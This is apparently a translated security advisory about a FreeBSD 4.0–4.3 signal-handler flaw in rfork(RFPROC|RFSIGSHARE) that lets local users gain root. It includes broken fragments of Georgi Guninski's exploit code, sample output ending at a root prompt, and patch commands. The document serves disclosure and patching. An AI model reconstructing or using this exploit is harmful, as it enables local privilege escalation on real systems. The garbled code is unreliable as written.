A design vulnerability was found in FreeBSD 4.3, which allows users to insert signal handlers in other processes. The problem lies in rfork(RFPROC|RFSIGSHARE) . If the child process exec() a setuid program, and then the parent process sets a signal handler, this signal handler will be copied in the child process. Sending a signal to the child process will cause signal handlers to be executed.
Using this vulnerability, local attackers can obtain root permissions.
The following code is only used to test and study this vulnerability, and if you use it for improper means, please bear the consequences.
-----------------------------------
/}
}
printf("vvfreebsd. Written by Georgi Guninski\n");
printf("shall jump to %x\n",vv1);
if(!(pid=rfork(RFPROC|RFSIGSHARE)))
{
printf("child=%d\n",getpid());
// /usr/bin/login and rlogin work for me. ping gives nonsuid shell
// if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
kill(pid,MYSIG);
printf("done\n");
while(42);
}
...............................
.........................
.............
Affected version:
FreeBSD 4.3 4.2 4.1 4.0
Early versions may be affected
Solution:
None yet
****** 2001-07-14 add by NetDemon(netdemon@) ******
How to use the test program:
netdemon%gcc -o vvbsd
netdemon%cp /bin/sh /tmp
netdemon%./vvbsd
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe71
child=61056
login:
login: # done
#
FreeBSD uses this to make a patch
method:
# fetch ftp:///pub/FreeBSD/CERT/patches/SA-01:42/signal-4.
# fetch ftp:///pub/FreeBSD/CERT/patches/SA-01:42/signal-4.
# cd /usr/src/sys/kern
# patch -p < /path/to/patch